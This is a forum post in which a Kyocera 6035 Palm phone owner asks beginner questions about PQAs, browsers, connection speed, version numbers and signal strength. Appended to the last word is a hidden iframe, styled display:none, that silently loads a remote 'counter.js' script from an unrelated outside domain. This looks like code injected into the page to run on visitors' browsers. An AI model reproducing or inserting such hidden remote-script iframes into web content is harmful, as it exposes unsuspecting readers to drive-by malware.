I am an experience user of Palm have a III and Vx but never a VII.

That is a lot I do not understand about the phoe (6035) an would like to learn. A lot of the post here seem to be for some experienced people even developer types it seems.

It would be helpful if there were a section that stepped a user through some stuff when they first get the phone. For example:

PQA I know it is a Palm VII thing but I don't know if I can use them on my 6035 or even how to put them in.

Browsers, I see a lot of talk of upgrading the browser to Blazer or something else with pictures and javascript support. However, does that really make sense with a connection of 14.4?

Connection speed, is 14.4 what others are connecting at or did I miss something.

Versions, I see a lot of talk on versions and people talking about what versions they have but I can't find anywhere on my phone that looks like the version numbers being quoted.

Phone reception, is there something that can increase my signal strength in areas that are weak. I have very weak signle in my home and around it but great signal pretty much everywhere else.

Enahancements, it would be nice to see a list of recommended enchancements to the phone, like software being used.

Thoughts?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>